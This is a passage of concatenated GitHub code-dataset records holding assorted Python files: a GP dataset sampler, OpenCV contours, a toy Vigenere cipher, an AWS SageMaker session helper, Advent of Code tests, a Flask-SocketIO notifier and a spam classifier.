\n obsN = len(tlocL) # total time points at which an observation is taken\n X= np.zeros((obsN*sensN,4)) # obsN*sensN is total observations over all sensors and all times\n # Build sensor locations\n X[:,0] = np.asarray(np.meshgrid(tlocL,xloc,yloc)).reshape(3,sensN*obsN)[0] #lower time\n X[:,2] = np.asarray(np.meshgrid(tlocL,xloc,yloc)).reshape(3,sensN*obsN)[1] # x location\n X[:,3] = np.asarray(np.meshgrid(tlocL,xloc,yloc)).reshape(3,sensN*obsN)[2] # ylocation\n X[:,1] = X[:,0]+0.1 # upper time\n\n sensors = FixedSensorModel(X,0.1) # establish sensor model arguments are sensor locations and spatial averaging\n\n k_0 = 0.01 #Diffusion\n R=0\n noiseSD = 0.05 #Observation noise\n \n boundary = ([0,0,0],[10,10,10])# corners of the grid - in units of space\n k = EQ(ls, 2.0) # generate EQ kernel arguments are lengthscale and variance\n res = [500,150,150] # grid size for time, x and y\n Nsamps = 1\n u1 = 0.4\n u2 = 0.4\n windmodel=WindSimple(u1,u2) # establish fixed wind model\n m = PDEModel(resolution=res,boundary=boundary,N_feat=N_feat,noiseSD=noiseSD,kernel=k,sensormodel=sensors,windmodel=windmodel,k_0=k_0,R=0)\n \n if non_neg:\n m.computeModelRegressors()\n Xnonneg = meshgridndim(m.boundary,10,True)\n nnc = NonNegConstraint(m,np.array([[]]),Xnonneg,thinning=5,burnin=100,jitter=0.02,verbose=True,meanZ = np.zeros(N_feat),covZ = np.eye(N_feat),startpointnormalised=True)\n Zs_nonneg = nnc.sample(Nsamps)\n z = Zs_nonneg[0,:]\n else:\n z = np.random.randn(N_feat)\n ####\n source=(m.computeSourceFromPhi(z))# Compute source\n conc=m.computeResponse(source) # Compute concentration - runs advection diffusion forward model\n Y= m.computeObservations(addNoise=True) # Compute observations with noise uses m.sensormodel for observation locations\n \n self.X = X\n self.Y = Y\n self.source = source\n self.conc = conc\n self.boundary = boundary\n self.m = m\n","repo_name":"SheffieldML/advectionGPdatasets","sub_path":"advectionGPdatasets/modelsample.py","file_name":"modelsample.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"18813902894","text":"import cv2\r\n\r\nimage_path = \"G:\\Save Files\\Python Save Files\\CV Drawing Techniques\\images\"\r\n\r\nimage = cv2.imread(image_path + '\\Balls Graphic.jpg', 0)\r\n\r\nedged_image = cv2.Canny(image, 30, 250)\r\n\r\ncontours, hierarchy = cv2.findContours(edged_image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n\r\ncontours_drawn = cv2.drawContours(image, contours, -1, (0, 0, 0), 5)\r\n\r\ncv2.imshow('Contours Drawn on Image', contours_drawn)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows","repo_name":"WaqasAkbarEngr/Computer-Vision-Drawing-Techniques","sub_path":"CV Drawing Contours.py","file_name":"CV Drawing Contours.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"1329804146","text":"alphabet = {0:'A',1:'B',2:'C',3:'D',4:'E',5:'F',6:'G',7:'H',8:'I',9:'J',10:'K',11:'L',12:'M',13:'N',14:'O',15:'P',16:'Q',17:'R',18:'S',19:'T',20:'U',21:'V',22:'W',23:'X',24:'Y',25:'Z', 26:',', 27:'.', 28:'-'}\n\ndef encrypt_message(plain_text, key):\n cipher_text = \"\"\n key_count = 0\n plain_text = capitalize_text(plain_text)\n key = capitalize_text(key)\n text_length = len(plain_text)\n key_length = len(key)\n master_key = make_key(text_length, key_length, key)\n for char in plain_text:\n if str.isalpha(char) == True:\n cipher_key = ((return_key(char) + return_key(master_key[key_count])) % 29)\n cipher_text = cipher_text + alphabet[cipher_key]\n else:\n cipher_key = ((return_key(char) + return_key(master_key[key_count])) % 29)\n cipher_text = cipher_text + alphabet[cipher_key]\n key_count = key_count + 1\n return cipher_text\n\ndef decrypt_message(encrypt_text, key):\n plain_text = ''\n key_count = 0\n encrypt_text = capitalize_text(encrypt_text)\n key = capitalize_text(key)\n text_length = len(encrypt_text)\n key_length = len(key)\n master_key = make_key(text_length, key_length, key)\n for char in encrypt_text:\n if str.isalpha(char) == True:\n plain_value = ((return_key(char) - return_key(master_key[key_count])) % 29)\n plain_text = plain_text + alphabet[plain_value]\n else:\n plain_value = ((return_key(char) - return_key(master_key[key_count])) % 29)\n plain_text = plain_text + alphabet[plain_value]\n key_count = key_count + 1\n return plain_text\n\ndef return_key(letter):\n for index in alphabet.keys():\n if alphabet[index] == letter:\n \treturn int(index)\n\ndef reverse_key(key):\n txt = []\n #goes through string in from last char to first char\n for i in range(len(key)-1, -1, -1):\n #appends each char to txt\n txt.append(key[i])\n return \"\".join(txt)\n\ndef make_key(t_length, k_length, key):\n while t_length > k_length:\n #adds key and reverse key\n key = key + reverse_key(key)\n #gets new length of key; should be 2xlen(key)\n k_length = len(key)\n if k_length > t_length:\n #shortens key to be the same as the plain_text\n key = key[0:t_length]\n return key\n\ndef capitalize_text(text):\n text = str.upper(text)\n text = text.replace(\" \", \"\")\n return text\n\ndef print_list(string, read):\n\tprint(string + ('').join(str(x) for x in read))\n\ndef shift_hash(binary):\n\treturn binary[12:] + binary[:12]\n\ndef get_bits(s, woof):\n bit = \"{0:08b}\".format(ord(s))\n for x in range(0,8):\n woof[x] = bit[x:x+1]\n return woof\n\ndef get_first_byte(woof):\n return woof[:8]\n\ndef compare_byte(woof, ruppy, check):\n hi = int((\"\").join(woof),2)\n there = int((\"\").join(map(str,ruppy)),2)\n #print_list(\"first 8:\", ruppy)\n #print_list(\"letter: \", woof)\n wow = hi ^ there\n howdy = \"{0:08b}\".format(wow)\n for x in range(0, 8):\n check[x] = howdy[x:x+1]\n \n #print_list(\"equals: \", check)\n return check\n\n\ndef add_bits(s, woof):\n\tbit = \"{0:08b}\".format(ord(s))\n\tfor x in range(0,8):\n\t\t\twoof[x] = bit[x:x+1]\n\treturn woof\n\ndef hash_input(string):\n new = [0] * 32\n car = [0] * 8\n test = [0] * 8\n check = [0] * 8\n for s in string:\n #print_list(s + \": \\t\", new)\n shifted = shift_hash(new)\n #print_list(\"Shift:\\t\", shifted)\n select = get_first_byte(shifted)\n added = get_bits(s, car)\n result = compare_byte(added, select, check)\n #print_list(\"Result:\\t\", result)\n new = result + shifted[8:]\n #print_list(\"New:\\t\", new)\n return new\n\ndef prompt_user():\n print(\"Would you like to encrypt or decrypt? \")\n print(\"1-Encrypt\")\n print(\"2-Decrypt\")\n print(\"3-Hash\")\n print(\"4-Exit\")\n print()\n answer = input(\"So, what's it going to be? \")\n try:\n \ta = int(answer)\n except ValueError:\n \tprint(\"Pleas input a valid ineger\")\n \tprompt_user()\n if int(answer) == 1:\n plain_text = input(\"Enter in a message to be encrypted: \")\n key = input(\"Enter in a key: \")\n encrypt_text = encrypt_message(plain_text, key)\n print(\"Encrypted message: \")\n print(encrypt_text)\n prompt_user()\n elif int(answer) == 2:\n encrypt_text = input(\"Enter in a message to be decrypted: \")\n key = input(\"Enter in a key: \")\n decrypt_text = decrypt_message(encrypt_text, key)\n print(\"Decrypted message: \")\n print(decrypt_text)\n prompt_user()\n elif int(answer) == 3:\n plain_text = input(\"Enter in a message to be hashed: \")\n key = input(\"Enter in a key: \")\n hash_string = plain_text + key\n result = hash_input(hash_string)\n together = ('').join(str(x) for x in result)\n print(\"\")\n print(\"Hashed: \" + together)\n hexed = \"{0:0x}\".format(int(together,2))\n print(\"Hexed: \\t\" + hexed)\n print(\"\")\n prompt_user()\n elif int(answer) == 4:\n \tprint(\"Thanks! Have a good day!\")\n else:\n print(\"You did not enter a valid answer\")\n prompt_user()\n\nprompt_user()","repo_name":"mthurin/Vigenere-Cipher-Hash-Function","sub_path":"vigenere_cipher_hash.py","file_name":"vigenere_cipher_hash.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36886439296","text":"\"\"\"\nDefinition for Undirected graph node\nclass UndirectedGraphNode:\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param: graph: a list of Undirected graph node\n @param: s: Undirected graph node\n @param: t: Undirected graph nodes\n @return: an integer\n \"\"\"\n def sixDegrees(self, graph, s, t):\n queue = collections.deque([s])\n seen = set([s.label])\n dist = 0\n while queue:\n for _ in range(len(queue)):\n q = queue.popleft()\n if q.label == t.label:\n return dist\n for nb in q.neighbors:\n if nb.label not in seen:\n queue.append(nb)\n seen.add(nb.label)\n dist += 1\n return -1\n","repo_name":"zhiqiuli/Lintcode","sub_path":"531-Six-Degrees.py","file_name":"531-Six-Degrees.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73365471677","text":"import svgwrite, os\r\n\r\nos.chdir(\"C:\\\\Users\\\\Benjamin\\\\Desktop\\\\BensFolder\\\\School\\\\ENS\\\\Saclay\\\\Stage\\\\Emmanuelle Anceaume\\\\Stage\\\\important\\\\Bitcoin viewer\\\\Stats\\\\\")\r\n\r\nfileName = \"bin\" # bin\r\n\r\nf = open(fileName + '.txt')\r\nlines = f.readlines()\r\nf.close()\r\nlinesLen = len(lines)\r\n\r\nmaxAmount = 0\r\nfor linesIndex in range(linesLen):\r\n line = lines[linesIndex]\r\n if line[-1] == \"\\n\":\r\n line = line[:-1]\r\n lineParts = line.split()\r\n hashLevel, amount = [int(linePart) for linePart in lineParts]\r\n if amount > maxAmount:\r\n maxAmount = amount\r\n\r\nwidth = 1000\r\n\r\nsvg_document = svgwrite.Drawing(filename = fileName + \"HashesStats.svg\", size = (str(width) + \"px\", str(linesLen * 15) + \"px\"))\r\n\r\ndef space(n):\r\n if n < 1000:\r\n return str(n)\r\n if n < 10000:\r\n return str(n)[0] + \" \" + str(n)[1:]\r\n if n < 100000:\r\n return str(n)[:2] + \" \" + str(n)[2:]\r\n if n < 1000000:\r\n return str(n)[:3] + \" \" + str(n)[3:]\r\n #return str(n)[:3] + \" \" + str(n)[3:]\r\n\r\nfor linesIndex in range(linesLen):\r\n line = lines[linesIndex]\r\n if line[-1] == \"\\n\":\r\n line = line[:-1]\r\n lineParts = line.split()\r\n hashLevel, amount = [int(linePart) for linePart in lineParts]\r\n rectSize = width * (amount / maxAmount)\r\n svg_document.add(svg_document.rect(insert = (0, linesIndex * 15), size = (str(rectSize) + \"px\", \"15px\"), stroke_width = \"1\", stroke = \"black\", fill = \"rgb(255,255,0)\"))\r\n\r\n svg_document.add(svg_document.text(str(hashLevel) + \" (\" + space(amount) + \")\", insert = (1, (linesIndex + 1) * 15 - 2)))\r\n\r\nsvg_document.save()","repo_name":"Benjamin-Loison/Mining-in-Logarithmic-Space","sub_path":"Statistics/bitcoinStatsViewer.py","file_name":"bitcoinStatsViewer.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"7953184013","text":"from aac.AACCore import *\nfrom kiLog import *\n\n\n'''\nSupport class to detect Yi4k (only) AAC blocks looking pretty suitable\nIt should be completely replaced by native AAC decoder. Eventually.\n'''\nclass AACDetect():\n\t#allowed max_sfb for [started]\n\tsfb8= [[12], [12]]\n\tsfb1= [[0,40], [40]]\n\n\tstarted= False\n\tseqNow= False\n\n\tdef __init__(self):\n\t\tself.reset()\n\n\n\tdef reset(self):\n\t\tself.started= False\n\t\tself.seqNow= False\n\n\n\tdef detect(self, _data, _limit=2):\n\t\taacStartA= []\n\t\taacPos= -1\n\n\t\t\t#spike. Yi4k limit, 30fps assumes mid-frame data have maximum 2 AACs\n\t\twhile (True if not _limit else (len(aacStartA)<_limit)):\n\t\t\taacPos= _data.find(b'\\x21', aacPos+1)\n\t\t\tif aacPos==-1:\n\t\t\t\tbreak\n\n\t\t\tif (\n\t\t\t\t(aacPos>0 and aacPos<256)\t#limit from begin\n\t\t\t\tor (len(_data)-aacPos<256)\t#limit from end\n\t\t\t):\n\t\t\t\tcontinue\n\n\n\n\t\t\taac= AACCore().aac_decode_frame(_data[aacPos:], limitSequence=self.seqNow)\n\t\t\tseqAfter= (\t#is aac ended up into sequence\n\t\t\t\taac.ics0.windows_sequence0==AACStatic.LONG_START_SEQUENCE\n\t\t\t\tor aac.ics0.windows_sequence0==AACStatic.EIGHT_SHORT_SEQUENCE\n\t\t\t)\n\n\t\t\tif (\n\t\t\t\taac.error\n\t\t\t\t#Yi4k specific:\n\t\t\t\tor (aac.ics0.max_sfb not in [self.sfb1,self.sfb8][aac.ics0.windows_sequence0==AACStatic.EIGHT_SHORT_SEQUENCE][self.started]) #allowed Maxsfb\n\t\t\t\tor (aac.ics0.use_kb_window0 == seqAfter)\t#limit combinations\n\t\t\t):\n\t\t\t\tcontinue\n\n\t\t\tif not self.started and not aac.ics0.max_sfb:\n\t\t\t\tkiLog.warn('AAC started from mid')\n\n\t\t\taacStartA.append(aacPos)\n\n\t\t\tself.seqNow= seqAfter\n\t\t\tself.started= True\n\n\n\n\n\t\taacEndA= aacStartA[1:] +[len(_data)]\n\n\t\taacA= []\t#[[start,end],..] pairs\n\t\tfor aacStart,aacEnd in zip(aacStartA,aacEndA):\n\t\t\taacA.append([aacStart,aacEnd])\n\n\t\treturn aacA\n\t\t","repo_name":"NikolayRag/strYim","sub_path":"src/recover/AACDetect.py","file_name":"AACDetect.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"96"} +{"seq_id":"6999059840","text":"\"\"\"AWSAccountClamp provides logic/functionality over a set of AWS IAM Services\"\"\"\nimport os\nimport boto3\nfrom botocore.exceptions import (\n ClientError,\n UnauthorizedSSOTokenError,\n TokenRetrievalError,\n)\nfrom botocore.credentials import RefreshableCredentials\nfrom botocore.session import get_session\nfrom sagemaker.session import Session as SageSession\nfrom datetime import timedelta\nimport logging\n\n\nclass AWSAccountClamp:\n def __new__(cls):\n \"\"\"AWSAccountClamp Singleton Pattern\"\"\"\n if not hasattr(cls, \"instance\"):\n # Initialize class attributes here\n cls.log = logging.getLogger(\"sageworks\")\n cls.log.info(\"Creating the AWSAccountClamp Singleton...\")\n cls.instance = super(AWSAccountClamp, cls).__new__(cls)\n cls.role_name = os.environ.get(\"SAGEWORKS_ROLE\", \"SageWorks-ExecutionRole\")\n cls.sageworks_bucket_name = os.environ.get(\"SAGEWORKS_BUCKET\")\n if cls.sageworks_bucket_name is None:\n cls.log.critical(\"Could not find ENV var for SAGEWORKS_BUCKET!\")\n raise EnvironmentError(\"Could not find ENV var for SAGEWORKS_BUCKET!\")\n try:\n cls.account_id = boto3.client(\"sts\").get_caller_identity()[\"Account\"]\n cls.region = boto3.session.Session().region_name\n except (ClientError, UnauthorizedSSOTokenError, TokenRetrievalError):\n msg = \"AWS Identity Check Failure: Check AWS_PROFILE and/or Renew SSO Token...\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n\n # Initialize the boto3 session (this is a refreshable session)\n cls.session_time_delta = timedelta(minutes=50)\n cls.boto3_session = cls._init_boto3_session()\n\n # Return the singleton\n return cls.instance\n\n @classmethod\n def check_aws_identity(cls) -> bool:\n \"\"\"Check the AWS Identity currently active\"\"\"\n # Check AWS Identity Token\n sts = boto3.client(\"sts\")\n try:\n identity = sts.get_caller_identity()\n cls.log.info(\"AWS Account Info:\")\n cls.log.info(f\"Account: {identity['Account']}\")\n cls.log.info(f\"ARN: {identity['Arn']}\")\n cls.log.info(f\"Region: {cls.region}\")\n return True\n except (ClientError, UnauthorizedSSOTokenError):\n msg = \"AWS Identity Check Failure: Check AWS_PROFILE and/or Renew SSO Token...\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n\n @classmethod\n def check_s3_access(cls, boto_session: boto3.Session) -> bool:\n s3 = boto_session.client(\"s3\")\n results = s3.list_buckets()\n for bucket in results[\"Buckets\"]:\n cls.log.info(f\"\\t{bucket['Name']}\")\n return True\n\n @classmethod\n def is_sageworks_role(cls) -> bool:\n \"\"\"Check if the current AWS Identity is the SageWorks Role\"\"\"\n sts = boto3.client(\"sts\")\n try:\n if cls.role_name in sts.get_caller_identity()[\"Arn\"]:\n return True\n except (ClientError, UnauthorizedSSOTokenError, TokenRetrievalError):\n msg = \"SageWorks Role Check Failure: Check AWS_PROFILE and/or Renew SSO Token...\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n\n @classmethod\n def sageworks_execution_role_arn(cls):\n \"\"\"Get the SageWorks Execution Role\"\"\"\n iam = boto3.client(\"iam\")\n try:\n role_arn = iam.get_role(RoleName=cls.role_name)[\"Role\"][\"Arn\"]\n return role_arn\n except iam.exceptions.NoSuchEntityException:\n msg = f\"Could Not Find Role {cls.role_name}\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n except UnauthorizedSSOTokenError:\n msg = \"SageWorks Role Check Failure: Check AWS_PROFILE and/or Renew SSO Token...\"\n cls.log.critical(msg)\n raise RuntimeError(msg)\n\n @classmethod\n def _session_credentials(cls):\n \"\"\"Internal: Set up our AWS Session credentials for automatic refresh\"\"\"\n\n # Assume the SageWorks Execution Role and then pull the credentials\n cls.log.debug(\"Assuming the SageWorks Execution Role and Refreshing Credentials...\")\n sts = boto3.Session().client(\"sts\")\n response = sts.assume_role(\n RoleArn=cls.sageworks_execution_role_arn(),\n RoleSessionName=\"sageworks-execution-role-session\",\n ).get(\"Credentials\")\n credentials = {\n \"access_key\": response.get(\"AccessKeyId\"),\n \"secret_key\": response.get(\"SecretAccessKey\"),\n \"token\": response.get(\"SessionToken\"),\n \"expiry_time\": response.get(\"Expiration\").isoformat(),\n }\n cls.log.debug(f\"Credentials Refreshed: Expires at {credentials['expiry_time']}\")\n return credentials\n\n @classmethod\n def _init_boto3_session(cls):\n if cls.is_sageworks_role():\n return boto3.Session()\n\n refreshable_credentials = RefreshableCredentials.create_from_metadata(\n metadata=cls._session_credentials(),\n refresh_using=cls._session_credentials,\n method=\"sts-assume-role\",\n )\n\n session = get_session()\n session._credentials = refreshable_credentials\n refreshable_session = boto3.Session(botocore_session=session)\n\n return refreshable_session\n\n @classmethod\n def boto_session(cls):\n \"\"\"Create a *refreshable* AWS/boto session so that clients don't get TOKEN timeouts\"\"\"\n return cls.boto3_session\n\n @classmethod\n def sagemaker_session(cls, session: boto3.Session = None):\n \"\"\"Create a sageworks SageMaker session (using our boto3 refreshable session)\"\"\"\n session = session or cls.boto_session()\n return SageSession(boto_session=session)\n\n @classmethod\n def sagemaker_client(cls, session: boto3.Session = None):\n \"\"\"Create a sageworks SageMaker client (using our boto3 refreshable session)\"\"\"\n session = session or cls.boto_session()\n return session.client(\"sagemaker\")\n\n\nif __name__ == \"__main__\":\n \"\"\"Exercise the AWS Account Clamp Class\"\"\"\n\n # Create the class\n aws_account_clamp = AWSAccountClamp()\n\n # Check out that AWS Account Clamp is working AOK\n \"\"\"Check if the AWS Account is Setup Correctly\"\"\"\n print(\"*** AWS Identity Check ***\")\n aws_account_clamp.check_aws_identity()\n print(\"Identity Check Success...\")\n\n print(\"*** AWS Assume SageWorks ExecutionRole Check ***\")\n check_boto_session = aws_account_clamp.boto_session()\n print(\"Assume Role Success...\")\n\n print(\"*** AWS S3 Access Check ***\")\n aws_account_clamp.check_s3_access(check_boto_session)\n print(\"S3 Access Check Success...\")\n\n print(\"*** AWS Sagemaker Session/Client Check ***\")\n sm_client = aws_account_clamp.sagemaker_client()\n print(sm_client.list_feature_groups()[\"FeatureGroupSummaries\"])\n","repo_name":"SuperCowPowers/sageworks","sub_path":"src/sageworks/aws_service_broker/aws_account_clamp.py","file_name":"aws_account_clamp.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"96"} +{"seq_id":"27932787793","text":"\"\"\"Unit tests for year 2022, day 22.\"\"\"\n\nfrom textwrap import dedent\n\nimport pytest\n\nfrom adventofcode.year2022.day22 import (\n Board,\n Cursor,\n Facing,\n Motion,\n parse_line,\n parse_data,\n part1,\n part2,\n)\n\n\n@pytest.mark.parametrize(\n 'cursor, motion, expected',\n [\n (\n Cursor(facing=Facing.R),\n Motion.R,\n Cursor(facing=Facing.D),\n ),\n (\n Cursor(facing=Facing.D),\n Motion.R,\n Cursor(facing=Facing.L),\n ),\n (\n Cursor(facing=Facing.L),\n Motion.R,\n Cursor(facing=Facing.U),\n ),\n (\n Cursor(facing=Facing.U),\n Motion.R,\n Cursor(facing=Facing.R),\n ),\n (\n Cursor(facing=Facing.R),\n Motion.L,\n Cursor(facing=Facing.U),\n ),\n (\n Cursor(facing=Facing.U),\n Motion.L,\n Cursor(facing=Facing.L),\n ),\n (\n Cursor(facing=Facing.L),\n Motion.L,\n Cursor(facing=Facing.D),\n ),\n (\n Cursor(facing=Facing.D),\n Motion.L,\n Cursor(facing=Facing.R),\n ),\n ],\n)\ndef test_cursor_rotate(cursor, motion, expected):\n result = cursor.rotate(motion)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'cursor, expected',\n [\n (Cursor(facing=Facing.R), Cursor(1, 0, Facing.R)),\n (Cursor(facing=Facing.D), Cursor(0, 1, Facing.D)),\n (Cursor(facing=Facing.L), Cursor(-1, 0, Facing.L)),\n (Cursor(facing=Facing.U), Cursor(0, -1, Facing.U)),\n ],\n)\ndef test_cursor_move(cursor, expected):\n result = cursor.move()\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'cursor, height, width, expected',\n [\n (Cursor(3, 0), 2, 2, Cursor(1, 0)),\n (Cursor(0, 3), 2, 2, Cursor(0, 1)),\n (Cursor(-1, 0), 2, 2, Cursor(1, 0)),\n (Cursor(0, -1), 2, 2, Cursor(0, 1)),\n ],\n)\ndef test_cursor_mod(cursor, height, width, expected):\n result = cursor.mod(height, width)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'block, expected',\n [\n ('.\\n..', Board(['. ', '..'])),\n ],\n)\ndef test_board_from_block(block, expected):\n result = Board.from_block(block)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'board, expected',\n [\n (Board(['.']), Cursor(0, 0, Facing.R)),\n (Board([' .']), Cursor(1, 0, Facing.R)),\n ],\n)\ndef test_board_begin(board, expected):\n result = board.begin()\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'board, cursor, expected',\n [\n (Board(['.']), Cursor(), '.'),\n (Board([' .']), Cursor(1), '.'),\n (Board(['', '.']), Cursor(y=1), '.'),\n (Board(['', ' .']), Cursor(x=1, y=1), '.'),\n ],\n)\ndef test_board_at(board, cursor, expected):\n result = board.at(cursor)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'board, cursor, move, expected',\n [\n (Board(['...']), Cursor(x=0), 1, Cursor(x=1)),\n (Board(['...']), Cursor(x=0), 2, Cursor(x=2)),\n (Board(['...']), Cursor(x=0), 3, Cursor(x=0)),\n (Board(['#..']), Cursor(x=1), 3, Cursor(x=2)),\n (Board(['.#.']), Cursor(x=2), 3, Cursor(x=0)),\n (Board([' ... ']), Cursor(x=2), 1, Cursor(x=3)),\n (Board([' ... ']), Cursor(x=2), 2, Cursor(x=4)),\n (Board([' ... ']), Cursor(x=2), 3, Cursor(x=2)),\n (Board([' #.. ']), Cursor(x=3), 3, Cursor(x=4)),\n (Board([' .#. ']), Cursor(x=4), 3, Cursor(x=2)),\n (\n Board([' ', ' ', '.', '.', '.', ' ', ' ']),\n Cursor(y=2, facing=Facing.D),\n 1,\n Cursor(y=3, facing=Facing.D),\n ),\n (\n Board([' ', ' ', '.', '.', '.', ' ', ' ']),\n Cursor(y=2, facing=Facing.D),\n 2,\n Cursor(y=4, facing=Facing.D),\n ),\n (\n Board([' ', ' ', '.', '.', '.', ' ', ' ']),\n Cursor(y=2, facing=Facing.D),\n 3,\n Cursor(y=2, facing=Facing.D),\n ),\n ],\n)\ndef test_board_move(board, cursor, move, expected):\n result = board.move(cursor, move)\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'line, expected',\n [\n ('R10', [Motion.R, 10]),\n ('10R', [10, Motion.R]),\n ('10R5', [10, Motion.R, 5]),\n ('10RL5', [10, Motion.R, Motion.L, 5]),\n ],\n)\ndef test_parse_line(line, expected):\n result = parse_line(line)\n assert result == expected\n\n\ndef test_parse_data():\n board, moves = parse_data(DATA)\n assert board.height == 12\n assert board.width == 16\n assert len(moves) == 13\n\n\ndef test_part1():\n result = part1(DATA)\n assert result == 6032\n\n\ndef test_part2():\n result = part2(DATA)\n assert result == 0\n\n\nDATA = dedent(\n \"\"\"\\\n ...#\n .#..\n #...\n ....\n...#.......#\n........#...\n..#....#....\n..........#.\n ...#....\n .....#..\n .#......\n ......#.\n\n10R5L5R10L4R5L5\n \"\"\",\n)\n","repo_name":"cr3/adventofcode","sub_path":"tests/year2022/test_day22.py","file_name":"test_day22.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"6344292326","text":"import eventlet\nfrom flask import Flask,render_template\nfrom rq import Queue\nfrom flask_socketio import SocketIO\nimport redis\n#from worker import r\n\napp=Flask(__name__)\napp.config[\"SECRET_KEY\"]=\"abcd123\"\n\nr=redis.Redis()\nq=Queue(connection=r)\neventlet.monkey_patch()\n\nsocketio=SocketIO(\n app,\n async_mode=\"eventlet\",\n logger=True,\n engineio_logger=True,\n allow_upgrades=True,\n cors_allowed_origins=\"*\",\n ping_timeout=10,\n ping_interval=10,\n message_queue=\"redis://\"\n)\n\n@socketio.on(\"connect\")\ndef connect():\n print('@socketio.on(\"connect\")')\n\ndef push_notification_job(data):\n socketio.emit(\"notification_js\",data)\n\n@app.route(\"/\",methods=[\"GET\"])\ndef index():\n return \"

Index Page

\"\n\n@app.route(\"/push_notification\",methods=[\"GET\"])\ndef push_notification(message):\n data={\"new_notification\":1}\n push=q.enqueue(message)\n return f\"

push notification page: {message}

\"\n\n@app.route(\"/notification\",methods=[\"GET\"])\ndef notification():\n return render_template(\"notification.html\")\n\nif __name__==\"__main__\":\n socketio.run(app,debug=True)\n","repo_name":"ishita0302/Parkezy","sub_path":"Notification.py","file_name":"Notification.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"38780979398","text":"import re\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom math import sqrt\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_curve\n\n'''\nSklearn Multinomial Naive Bayes\nhttps://scikit-learn.org/stable/modules/generated/sklearn.naive_bayes.MultinomialNB.html#sklearn.naive_bayes.MultinomialNB\n'''\n\n'''\nRemove any unnecessary punctuation, extra spacing, and converting all words to lowercasing\n'''\ndef message_preprocessing(data_set):\n data_set['text'] = data_set['text'].str.replace(r'\\W', ' ', regex=True)\n data_set['text'] = data_set['text'].str.lower()\n removed_extra_whitespace = []\n\n for message in data_set['text']:\n cleaned_up = re.sub(' +', ' ', message)\n removed_extra_whitespace.append(cleaned_up)\n\n return pd.Series(removed_extra_whitespace)\n\nemail_spam = pd.read_csv('./emails.csv')\n\ndf_text = message_preprocessing(email_spam)\ndf_spam = email_spam['spam']\n\ncount_vectorizer = CountVectorizer()\ndf_text_count = count_vectorizer.fit_transform(df_text)\n\nx_training, x_testing, y_training, y_testing = train_test_split(df_text_count, df_spam, test_size=0.2, random_state=42)\n\nclassify = MultinomialNB()\nclassify.fit(x_training, y_training)\n\n\n# confusion matrix\npredicted = classify.predict(x_testing)\nconfusion_result = confusion_matrix(y_testing, predicted)\nprint(f'Confusion matrix: \\n{confusion_result}\\n')\n\n# comparison based on % accuracy\naccuracy = classify.score(x_testing, y_testing)\nprint(f'Comparison based on % accuracy: {accuracy}\\n')\n\n# comparison based on sensitivity, specificity, and precision\ntrue_positives = confusion_result[0][0]\nfalse_positives = confusion_result[0][1]\ntrue_negatives = confusion_result[1][1]\nfalse_negatives = confusion_result[1][0]\n\n# sensitivity\nsensitivity = true_positives / (true_positives + false_negatives)\n# specificity\nspecificity = true_negatives / (true_negatives + false_positives)\n# precision\nprecision = true_positives / (true_positives + false_positives)\n\nprint(f'Sensitivity: {sensitivity}, Specificity: {specificity}, Precision: {precision}\\n')\n\n# calculate roc curve\ny_score = classify.predict_proba(x_testing)[::,1] # same thing as calculating the probability estimates ie y_prob\n\nfpr, tpr, thresholds = roc_curve(y_testing, y_score, pos_label=1)\nprint(f'ROC=> false positive rate: \\n{fpr}\\n, true positive rate: \\n{tpr}\\n, thresholds: \\n{thresholds}\\n')\n\n# plot ROC\nplt.figure()\nlw = 2\nplt.plot(fpr, tpr, color=\"red\", lw=lw, label=\"ROC curve\")\nplt.plot([0,1], [0,1], color=\"black\", lw=lw, linestyle=\"--\")\nplt.xlim([0.0,1.0])\nplt.ylim([0.0,1.05])\nplt.xlabel(\"False Positive Rate (FPR)\")\nplt.ylabel(\"True Positive Rate (TPR)\")\nplt.title('Testing actual data vs testing predicted data ROC')\nplt.legend(loc=\"lower right\")\nplt.show()\n\n# 95% confidence interval for prediction accuracy\ninterval = 1.96 * sqrt((accuracy*(1-accuracy))/ df_text.size * 0.2)\nprint('%.3f' % 